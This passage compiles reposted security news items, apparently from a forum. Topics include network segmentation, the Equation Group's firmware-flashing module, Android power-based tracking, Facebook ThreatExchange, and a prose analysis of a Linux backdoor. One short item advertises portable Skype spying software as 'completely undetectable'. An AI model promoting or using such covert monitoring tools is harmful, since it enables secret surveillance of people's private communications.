data within the network. The Payment Card Industry Data Security Standard (PCI-DSS) is such, and in this case sensitive information like payment card data should be isolated from the rest of the network. Case Study: Target Data Breach As some of the recent data breaches have shown, improper network segmentation can result in exposure of your data to system outages or theft. Stolen third-party credentials can be further exploited for getting a foothold in entire networks. That was the case with the infamous Target data leakage in December 2013. According to Jody Brazil, founder of the security vendor FireMon, Target failed to secure in a proper fashion the access of third parties to their payment systems. A main lapse seems to be the fact that they did not segment the network to ensure that sensitive cardholder data was separated from what outsiders can access – which is a noncompliance in itself with a ubiquitous security practice pursuant to the aforementioned PCI-DSS. Finally, Brazil concludes that despite the sophisticated nature of the malware used to intercept and steal payment card data from the company’s Point-of-sale (POS) systems, the attacker would have been stopped at the installation phase if Target had followed network segmentation procedures in the first place. Enhanced Security with Proper Encryption The classical security architecture counts on establishment of a trusted internal network guarded by firewalls. Thus, applications in the safe zone are deemed totally trustworthy. Security analysts bring these assumptions into question. As if the old maxima “Hope for the best and prepare for (assume) the worst” is better justified in terms of real-deal proactive security measures like encryption, especially for preservation of sensitive data. A survey conducted by Spiceworks, a professional network for IT specialists, ascertains that 76% of the IT managers use at least two forms of encryption to ensure that the data traffic of their enterprises is secure. Astonishingly, one out of three admits that he is forced to use three or more kinds of encryption or VPNs for data in motion. It seems clear that this might be a security problem, since these managers cannot reach some form of consensus concerning the promulgation of a uniform and consistent encryption policy, which would encompass all network segments and applications under its belt. Consequently, all gaps and inconsistencies in data traffic security are an aftermath of the existent fragmented environment. Corporations encounter difficulties with encryption management chiefly because of the fragmentation, which has a performance impact on firewalls and network devices. The direct effect of these issues is felt in the form of deployment of less than ideal data traffic security to compensate for shortcomings existing in network systems and firewalls – a dangerous trade-off that IT managers are bound to do. The following statistic reflects on the aforementioned subject: “45% of the respondents said encryption is too difficult to manage to use for segmentation, while 36 percent cited the performance hit on firewalls and network devices when encryption is turned on.” Presumably, the coordination of extremely fragmented, fractured means of data encryption and segmentation is often an arduous chore. Is it abstaining from encrypting a viable alternative? Highly unlikely. Nevertheless, more than half of the surveyed organizations confirm that concerns about performance quality preclude them from opting for this multiple encryption. II. Mobile Data Traffic and Network Security The mobile unencrypted traffic from apps is growing each month. At the moment 49% of all app traffic is unencrypted, which means that it is vulnerable to snooping and injection cyber attacks. These pose a significant threat to the normal functioning of day-to-day business operations. Interestingly, outsiders finding a loophole in the corporate network is not as frequent of a security nuisance as unsuspecting employees opening a door to a malicious cyber attack. Most users (72%) do not feel uncomfortable (at least at the beginning) with sharing sensitive information in their apps, such as credit card details and passwords. Diagram 3 Source: http://commons.wikimedia.org/wiki/File:Consumerization_Report_-_Chart_3.jpg (by Cgarlati). Bring Your Own Device (BYOD) Many people in Western countries have up to five Internet-connectable devices and 300 identities across a great number of online shopping portals and social media – an ongoing tendency that ushers in the bring your own device (BYOD) revolution. From a business point of view, there is a monetary as well as reputational risk associated with not being able to protect the data trusted to them because of the increasing adoption of personal devices in the workplace. And from a data transfer perspective, the equation gets even more complicated when cloud-based platforms allow employees to access business information regardless of geographic location. Besides proper employee management (that could be an IT security training of personnel), identity control based on staff movement restrictions across virtual, cloud and physical environment is vital for complying with the current standards in terms of efficiency and security. The silo style of mobility Mobile-device management and enterprise-mobility management have been developed by enterprises to manage devices like tablets and smartphones. Under the standard approach, these two systems integrate with a VPN server, for instance, to set up an encrypted data connection to the company. The silo-based nature of all mobile devices, however, localize the perimeter protection to the company’s boundaries. Consequently, if an employee has credentials on his mobile device, a malicious actor can obtain and leverage them to gain unfettered access to internal networks. And we all know that personal devices typically do not possess antivirus/antimalware software and often share information with untrustworthy apps. The security threat stems from the fact that all internal networks of the corporation continue to be considered “safe” and “trusted” (See Diagram 4). As a result, enterprises often use insufficient controls to segment data traffic and secure or isolate internal applications containing sensitive servers. Diagram 4 Conclusion The Spiceworks survey reported that improving network security was put on the priority agenda for the IT sector in 2015. Allocating funds to network security projects for this years is envisaged by approximately two-thirds of all enterprises participating in the interview. We can only hope that these measures will not come as “too little, too late”. And while the investment in the reconstruction of outdated network architectures and data traffic mechanisms is important, we should not forget to adjust our personal perception to these changes. Reference List Boone, A. (2015). Network Security Trends and Outlook. Retrieved on 15/02/2015 from https://www.sdxcentral.com/articles/contributed/network-security-trends-and-outlook-2015/2015/01/ Boone, A. (2015). 2015 Predictions: Mobile security set for change in 2015. Retrieved on 15/02/2015 from http://www.rcrwireless.com/20150109/opinion/2015-predictions-mobile-security-set-for-change-in-2015-tag10 Certes (2015). Solving the data traffic encryption tangle. Retrieved on 15/02/2015 from http://certesnetworks.com/blog/solving-the-data-traffic-encryption-tangle/ Cryptozone. Network Segmentation. Retrieved on 15/02/2015 from http://www.cryptzone.com/solutions/network-segmentation Forsyth, L. (2012). Poor data security can cause lasting damage to your enterprise. Retrieved on 15/02/2015 from http://www.theguardian.com/media-network/media-network-blog/2012/dec/13/internet-data-security-enterprise Harrison, R. (2014). Network Segmentation Key To Good Network Hygiene. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-key-to-good-network-hygiene/a/d-id/1269687 McGillicuddy, S. (2014). SDN security issues: How secure is the SDN stack? Retrieved on 15/02/2015 from http://searchsdn.techtarget.com/news/2240214438/SDN-security-issues-How-secure-is-the-SDN-stack Natarajan, P. (2014). Rock-solid Data Traffic Security in a Virtualized Network World. Retrieved on 15/02/2015 from www.ciena.com/connect/blog/Rock-solid-Data-Traffic-Security-in-a-Virtualized-Network-World.html Open Networking Foundation (2013). SDN Security Considerations in the Data Center. Retrieved on 15/02/2015 from https://www.opennetworking.org/images/stories/downloads/sdn-resources/solution-briefs/sb-security-data-center.pdf Olzak, T. (2012). VLAN Network Segmentation and Security- Chapter 5. Retrieved on 15/02/2015 from http://resources.infosecinstitute.com/vlan-network-chapter-5/ Palo Alto Networks. Zero Trust Approach To Network Segmentation. Retrieved on 15/02/2015 from https://www.paloaltonetworks.com/solutions/initiative/network-segmentation.html Philbin (2014). Mobile Data Trends Report shows nearly half of app traffic now unencrypted. Retrieved on 15/02/2015 from https://www.wandera.com/blog/mobile-data-trends-report-shows-nearly-half-of-app-traffic-now-unencrypted/ Reichenberg, N. (2014). Improving Security via Proper Network Segmentation. Retrieved on 15/02/2015 from http://www.securityweek.com/improving-security-proper-network-segmentation SDNCentral. SDN Security Challenges in SDN Environments. Retrieved on 15/02/2015 from https://www.sdxcentral.com/resources/security/security-challenges-sdn-software-defined-networks/ TrendMicro (2013). Catch Evasive Threats That Hide Behind Real Network Traffic. Retrieved on 15/02/2015 from www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-network-detection-evasion-methods.pdf Vijayan, J. (2014). Target breach happened because of a basic network segmentation error. Retrieved on 15/02/2015 from http://www.computerworld.com/article/2487425/cybercrime-hacking/target-breach-happened-because-of-a-basic-network-segmentation-error.html Diagram 1 and 2 are based on graphs in: Raza, K. (2015). Network Segmentation & SD-WAN. Retrieved on 15/02/2015 from http://www.networkcomputing.com/networking/network-segmentation-and-sd-wan/a/d-id/1318634 Source

One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive’s firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—“surpasses anything else” they had ever seen. The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named “nls_933w.dll”, is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered. It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don’t get encrypted. Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky’s Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption. Here’s what we know about the firmware-flashing module. How It Works Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides. When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquatinoDrug and one with a 2013 compilation date that is used with GrayFish. The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer’s operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system. Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one. The attack works because firmware was never designed with security in mind. Hard disk makers don’t cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don’t examine it. There’s also no easy way for users to read the firmware and manually check if it’s been altered. The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba. “You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works,” Raiu says. The Kaspersky researchers have called it “an astonishing technical accomplishment and is testament to the group’s abilities.” Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation. Hidden Storage Is the Holy Grail The revelation that the firmware hack helps store data the attackers want to steal didn’t get much play when the story broke last week, but it’s the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there’s still a lot that’s unknown about the attack, but some of it can be surmised. The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal. This is particularly useful if the the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they’re unencrypted and save them to this hidden area on the machine that doesn’t get encrypted. There isn’t much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption. “Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area,” Raiu says. Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls “customs opportunities,” and extract the password from this hidden area to unlock the encrypted disk. Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications. “[The owners] only use it in some very specific cases where there is no other way around it,” Raiu says. “Think about Bin Laden who lived in the desert in an isolated compound—doesn’t have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific.” Raiu thinks, however, that the attackers have a grander scheme in mind. “In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs.” They wouldn’t need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists. There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved are or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space. An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted “not only that these areas can’t be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools.” Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage. To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, “y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible,” Berkman writes. It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail. One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there’s only 80 MB, it’s a dead giveaway that something is there that shouldn’t be. But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem. NSA Interns to the Rescue The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the “Covert Storage” project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk. “The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space,” the document reads. “It would report this size back to the operating system and not provide any way to access the additional space.” Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible. The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command. How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out. Source

Android phones can be tracked without using their GPS or wi-fi data by studying their power use over time, a study has found. A smartphone uses more power the further away it is from a cellular base and the more obstacles are in its way as it reaches for a signal. Additional power use by other activities could be factored out with algorithms, the researchers found. They created an app designed to collect data about power consumption. "The malicious app has neither permission to access the GPS nor other location providers (eg cellular or wi-fi network)," the team - Yan Michalevsky, Dan Boneh and Aaron Schulman, from the computer science department at Stanford University, along with Gabi Nakibly, from Rafael Ltd - wrote in their paper. "We only assume permission for network connectivity and access to the power data. "These are very common permissions for an application, and are unlikely to raise suspicion on the part of the victim." There are 179 apps currently available on Android app store Google Play that request this information, the team add. Activity such as listening to music, activating maps, taking voice calls or using social media all drain the battery but this can be discounted due to "machine learning", the report says. "Intuitively the reason why all this noise does not mislead our algorithms is that the noise is not correlated with the phone's location," it says. "Therefore a sufficiently long power measurement (several minutes) enables the learning algorithm to 'see' through the noise." The tests were carried out on phones using the 3G network but did not measure signal strength as that data is protected by the device. 'Stuffed with sensors' "With mobile devices now becoming ubiquitous, it is troubling that we are seeing so many ways in which they can be used to track us," said cyber-security expert Prof Alan Woodward, from Surrey University. "I think people sometimes forget that smartphones are stuffed full of sensors from gyroscopes and GPS to the more obvious microphones and cameras. "This latest work shows that even that basic characteristics (power consumption) has the potential to invade privacy if monitored in the right way," he added. "We are approaching the point where the only safe way to use your phone is to pull the battery out - and not all phones let you do that." Source

Skype Spy USB Edition software allows you to monitor and track all Skype chats and activities, such as file transfers or calls. You can search monitored Skype data, make copies of data, and restore the data as well. Best of all, Skype Spy USB Edition is portable — you can easily run it from USB flash drive and use it on any computer without installation. In this way the app stays completely undetectable. It is a great option for anyone looking for an effective parental control solution or employee monitoring software. Free Skype Spy USB Edition (100% discount) Inca 4 zile si expira.

Privacy International (PI) is calling on people to sign up to be part of a mass request for confirmation they have been spied on by Five Eyes spy agencies and to demand the removal of captured information. Would-be signatories are being asked to submit their name and email address to the organisation, which will then pass them on to Britain's Investigatory Powers Tribunal tasked with determining if the sharing of NSA-intercepted material with the UK's GCHQ spy agency was illegal. The requests would cover a prodigious amount of data numbering billions of records hoovered up by the NSA and shared with the GCHQ until December last year. PI will not reveal if agencies other than the NSA collected data, and would cover only that shipped to the GCHQ. This could conceivably include data captured by any Five Eyes agency and shared with the GCHQ via the NSA. The offer came on the heels of the tribunal's ruling this month in favour of Privacy International that the mass funnelling of intelligence information between Britain and the United States was illegal prior to December. That decision made on the grounds that rules governing the exchange were secret opened an avenue for users to request the tribunal examine and notify if their data was illegally obtained and, if found in breach, for the information to be destroyed. The British charity dubbed the ruling a "major victory against the Five Eyes" group of nations which includes Australia, New Zealand and Canada, and said it was possible only due to the flurry of NSA leaks from Edward Snowden. "Through their secret intelligence sharing relationship with the NSA, GCHQ has had intermittently unrestricted access to PRISM - NSA's means of directly accessing data and content handled by some of the world’s largest Internet companies, including Microsoft, Yahoo, Google, Facebook, PalTalk, AOL, Skype, YouTube and Apple," deputy director Eric King said at the time. "GCHQ's access to NSA material therefore makes up the large bulk of all surveillance material handled by the security services; some ex- GCHQ staffers estimated that 95 per cent of all signals intelligence material handled at GCHQ is American. "The extraordinary implications of [the] judgement is that all historical sharing of raw intelligence between NSA and GCHQ took place without an adequate legal framework, and thus was unlawful." The Tribunal will likely be swamped if the campaign takes off. Probes could trawl records collected from NSA programmes UPSTREAM, CO-TRAVELLER, and DISHFIRE, the former having intercepted some 160 billion records from its top five programmes in one month alone. Privacy International said requests could take years to be fulfilled. New requests could be made to discover the data collected by individual agencies to current day if the charity was successful in its appeal with the European Court of Human Rights against the decision that the data shared between the US and UK spy agencies was kosher due to the policies of the arrangement being made public as a result of the legal action Source

CANCUN – Hannes Sjoblad of the Swedish Biohacking Association throws a mean implant party, the latest of which was held today on stage at the Security Analyst Summit. Kaspersky Lab researcher Povel Torudd bravely volunteered to have a NFC implant the side of a grain of rice shot into the skin between his thumb and forefinger. The chips can be used for a variety of purposes, including as a second form of authentication or the tracking of healthcare information, and people such as Sjoblad believe implants can soon supplant things such as car keys, proximity cards and other authenticators, while also introducing additional risk to users’ physical well being and privacy. “These implants have the potential to be used for digital logins, storage of public encryption keys, and perhaps replace all silly passwords and don’t work,” Sjoblad said. “This technology has the potential for solving these issues.” Data collected by the tiny battery-powered APT chip can be read by a mobile app. Sjoblad, for example, has also set up in his chip rebate memberships for retailers where he shops in Sweden, his business cards, gym membership cards and more. “It’s made my life easier and interesting,” he said. From a security perspective, however, implanting a tracking technology introduces physical risk to the wearer. Already, with existing human implant technology such as insulin pumps, pacemakers, cochlear implants, there are risks that they can be remotely accessible, putting private data. Complicating matters is the introduction of health care data into the equation. For example, health care monitors track volumes of personal data over periods of time, trending data that could be of value if exposed, not to mention a detriment to the user’s privacy. Sjoblad slots usage of implanted NFC chips into a pair of categories: identification and information storage. The chips can be used to identify and authenticate the user for building entry or transaction verification, or use stored data for personalization, in a car for example, to adjust seat and mirror settings automatically for the particular user. The saving grace for security may be the potential for this technology to replace passwords, a long reviled means of authentication that’s simply bypassed, onerous to manage and a general failure given the recent litany of breaches. “Passwords are not human friendly,” Sjoblad said. Source

After weeks of mounting pressure from national governments for increased access to personal data following the Charlie Hebdo attack, the European Parliament has pulled a switch that aims to simultaneously increase citizens’ privacy rights while also giving law enforcement agencies more ability to track travellers. As they twist and turn like a twisty turny thing, MEPs are essentially leveraging national governments’ desire for a PNR (Passenger Name Record) tracking system to get the draft Data Protection Regulation legislation approved. In a resolution approved by 532 votes to 136, with 36 abstentions, lawmakers demanded that member states make faster progress on the new data protection laws “so that talks could proceed in parallel with those on an EU Passenger Name Record proposal”. In other words, give us what we want and we might relent on our opposition to PNR. MEPs said they would work “towards the finalisation of an EU PNR directive by the end of the year”. However, Jan Philipp Albrecht, the German MEP who has successfully steered the Data Protection Regulation this far, was against the move, believing that PNR should not be negotiated on any terms. He points to the ruling by the European Court of Justice last year which annulled the Data Retention Directive on the grounds that indiscriminate, blanket data retention is illegal. There are concerns from some MEPs that PNR, which the the Parliament has in the past rejected, is exactly the sort of blanket information gathering that the ECJ blocked. The PNR proposal would involved gathering all the information collected by airlines about passengers, including sensitive and personal information such as email addresses, credit card details, phone numbers, meal choices (halal, kosher, etc). Even Birgit Sippel, an MEP who voted in favour of the resolution, admitted that “the current draft EU PNR proposal needs to be revised to comply with the ECJ judgement on the Data Retention Directive". The Parliament also proposes other steps, such as investment in educational and social schemes that address the root causes of radicalisation, “disengagement and de-radicalisation” programmes and increased information sharing. “Member states should improve the exchange of information between law enforcement authorities and EU agencies. Only 50 per cent of information regarding terrorism and organised crime is currently given by member states to Europol and Eurojust,” highlights the Parliament statement. ® Sursa

Facebook, with its giant infrastructure and its equally wide view into Internet attacks, has built an information-sharing platform that it hopes will entice other big technology companies to join and contribute threat data and indicators of compromise. The platform, called ThreatExchange, already counts Pinterest, Yahoo, Tumblr, Twitter, Bitly and Dropbox among its early members. The cost is free, and most of the heavy lifting is done by Facebook’s infrastructure. The platform developers were also cognizant of some of the concerns enterprises have about sharing threat data, from both a competitive and risk management standpoint. Privacy controls are built in to ThreatExchange that not only sanitize information provided by members, but also allows contributors to share data with all of the exchange’s members, or only particular subsets. In addition to threat information shared by contributors, open source threat intelligence feeds are pulled into the platform. Mark Hammell, manager of Facebook’s threat infrastructure team, would not identify any of the open source feeds until some legal machinations are worked out. Facebook will homogenize all of those respective feeds’ data formats and make them consumable via ThreatExchange. “We’re able to leverage a huge community doing security research independently and give them a platform,” Hammell said. Hammell said he hopes the initial partner list grows to include other technology companies with a large Internet footprint. Microsoft, for example, has developed its own information sharing platform called Interflow, while the FBI announced last winter that it was releasing an unclassified version of its malware repository in the hopes of spurring public-private sharing of threat data. “If some reasonably large Internet properties cooperate on attacks they’ve seen and responded to, the vast majority of the Internet will be safer,” Hammell said. “We want to bring in more companies like that and eventually broaden it beyond big companies to smaller web properties and researchers. We want to create a forum where we can share attack and threat information in an easy way and share it with as many who want to receive it. “We realize that any problem that affects the Internet affects our products in lockstep,” Hammell said. “The corollary there is that the more we can do to take on larger problems the Internet is facing, the better our products will be and the safer the Internet will be.” ThreatExchange is an API-based exchange; IT admins will be able to consume threat data via the APIs and write signatures and other protections accordingly. Participants can share threat data such as malware samples, lists of malicious URLs and other indicators of compromise that make sense. While participants will be able to see the data, the will not be able to tell where it’s coming from, though everyone will have access to list of members. “You can see URLs that are known as bad, or metadata, but you cannot tell where it’s coming from; there is no attribution in the data,” Hammell said. Privacy controls within the framework allow contributors to publish breach data such as domains used in an attack or malware hashes and select who sees it. Facebook said there was one added use case where a contributor is allowed to select only specific other organizations to share data with. “The classic example is an attack you’re investigating where only you and a few companies are targeted,” Hammell explained. “They can collaborate together on that particular attack and share data, but perhaps they don’t feel it’s appropriate to go wider because it may tip their hand and alert the attacker, or it would not be beneficial to the investigation if others started poking at the infrastructure and possibly disrupt the work they’re doing. It’s an important scenario to get right.” Hammell added that the platform is free, and the intent is for it to stay that way. “We want the platform to be a medium to share what people want to share,” he said. Sursa

Una dintre cele mai frecvent utilizate functii ale smartphone-urilor este mesageria. O comunicare privata trebuie sa ramana privata, iar comunicarea in interes de servici nu trebuie sa fie, in nicio imprejurare, interceptata; sub aceasta deviza G DATA prezinta noua sa aplicatie Secure Messaging la Mobile World Congress 2015 din Barcelona. G DATA SECURE CHAT ofera securitate extrema, text multi-criptat si comunicare chat – si totodata, garanteaza transferul securizat de fisiere media, de exemplu transferul de fotografii. G DATA se bazeaza pe protocolul securizat Axolotl, care a fost initiat de TextSecure si care are deja peste 10 milioane de utilizatori din intreaga lume. G Data prezinta si alte repere la Barcelona: INTERNET SECURITY pentru Android si Mobile Device Management. Companiile isi pot pastra smartphone-urile si tabletele in siguranta, oriunde in lume, datorita solutiei mobile de securitate “Made in Germany”. G DATA va expune la Mobile World Congress 2015 de la Barcelona in Pavilionul 6, Standul 6B40, in perioada 2- 5 martie 2015. “Protectia comunicatiilor mobile si integrarea dispozitivelor mobile in concepte de securitate la nivel de companie devin din ce in ce mai importante pentru companii. G DATA se pozitioneaz? ca un lider in tehnologie in acest sector si ca furnizor de solutii de securitate IT complete,” spune Walter Schumann, CSO G DATA Software AG. Protejarea mesajelor, datelor si comunicatiilor de voce impotriva atacatorilor cibernetici, sustragerilor neautorizate de date si atacurilor spyware este provocarea majora a viitorului.” Cu SECURE CHAT oferim utilizatorilor de smartphone-uri si tablete o aplicatie usor de utilizat, care cripteaza, extrem de eficient, mesageria mobila, si astfel, ofera o protectie eficient impotriva accesului tertilor.” O versiune gratuita a aplicatiei G DATA SECURE CHAT, cu capacitati complete de criptare text, comunicare prin chat si trimiteri de imagini, va fi disponibila pe site-ul G DATA si in Google Play Store din aprilie 2015. Comunica in siguranta, fara restrictii Protocolul Axolotl permite utilizatorilor sa comunice cu un nivel ridicat de criptare, indiferent de aplicatia de mesagerie folosita. Datorita procesului de criptare bazat pe curbe eliptice, acest protocol este considerat pe plan international ca fiind extrem de sigur, fiind practic indestructibil. Singura conditie este de a utiliza o aplicatie care utilizeaza protocolul de criptare, cum ar fi G DATA SECURE CHAT sau TextSecure de la Open Whisper Systems. G DATA SECURE CHAT pe scurt: Criptare securizata end-to-end pentru chat individual si de grup Un rapid, simplu si mai presus de toate, securizat mod de a trimite imagini si fotografii utilizand criptografia Backup al istoricului pe cardul SD Criptarea prin parola a istoricului Caracteristici ale versiunii Premium (licenta de G DATA INTERNET SECURITY FOR ANDROID este necesara): Filtru antiphishing pentru URL-urile din mesajele de pe chat Filtru pentru mesajele primite si trimise si pentru SMS-uri Capacitatea de a ascunde contactele selectate prin SMS TRUST IN GERMAN SICHERHEIT G DATA la Mobile World Congress 2015: Pavilionul 6, Standul 6B40 -> Sursa: MWC 2015: G DATA lanseaza un serviciu impenetrabil de mesagerie mobila

Security researchers with Russian anti-virus company Doctor Web have examined a complex, multi-purpose backdoor for Linux. This malicious program can execute various commands issued by intruders such as to mount DDoS attacks and to perform a wide range of other malicious tasks. To spread the new Linux backdoor, dubbed Linux.BackDoor.Xnote.1, criminals mount a brute force attack to establish an SSH connection with a target machine. Doctor Web security researchers believe that the Chinese hacker group ChinaZ may be behind this backdoor. Once Linux.BackDoor.Xnote.1 gets in, it checks to see whether its copy is already running in the infected system. If it is, the backdoor exits. The malware will only be installed in a system if it has been launched with superuser (root) privileges. During installation, the malware creates a copy of itself in the /bin/ directory in the form of a file called iptable6. It then deletes the original file that was used to launch it. Linux.BackDoor.Xnote.1 also searches the /etc/init.d/ directory for a script that starts with the line "#!/bin/bash" and adds another line to it so that the backdoor will be launched automatically. The program uses the following routine to exchange data with the intruders' control server. To obtain configuration data, the backdoor looks for a special string in its body—the string points to the beginning of the encrypted configuration block, then decrypts it and starts sending queries to control servers on the list until it finds a responding server or until the list ends. Both the backdoor and the server use the library zlib to compress the packets they exchange. First, Linux.BackDoor.Xnote.1 sends information about the infected system to the server. It then goes into standby mode and awaits further instructions. If the command involves carrying out some task, the backdoor creates a separate process that establishes its own connection to the server through which it gets all the necessary configuration data and sends the results of the executed task. Thus, when commanded to do so, Linux.BackDoor.Xnote.1 can assign a unique ID to an infected machine, start a DDoS attack on a remote host with a specific address (it can mount SYN Flood, UDP Flood, HTTP Flood and NTP Amplification attacks), stop an attack, update its executable, write data to a file, or remove itself. The backdoor can also perform a number of actions with files. Having received the appropriate command, Linux.BackDoor.Xnote.1 sends information about the file system of the infected computer (the total number of data blocks in the file system and the number of free blocks) to the server and stands by for other directives which can include: List files and directories inside the specified directory. Send directory size data to the server. Create a file in which received data can be stored. Accept a file. Send a file to the command and control (C&C) server. Delete a file. Delete a directory. Signal the server that it is ready to accept a file. Create a directory. Rename a file. Run a file. In addition, the backdoor can run a shell with the specified environment variables and grant the C&C server access to the shell, start a SOCKS proxy on an infected computer, or start its own implementation of the portmap server. The signature of this malware has been added to the Dr.Web virus database, so systems protected by Dr.Web Anti-virus for Linux are safe from this backdoor. Source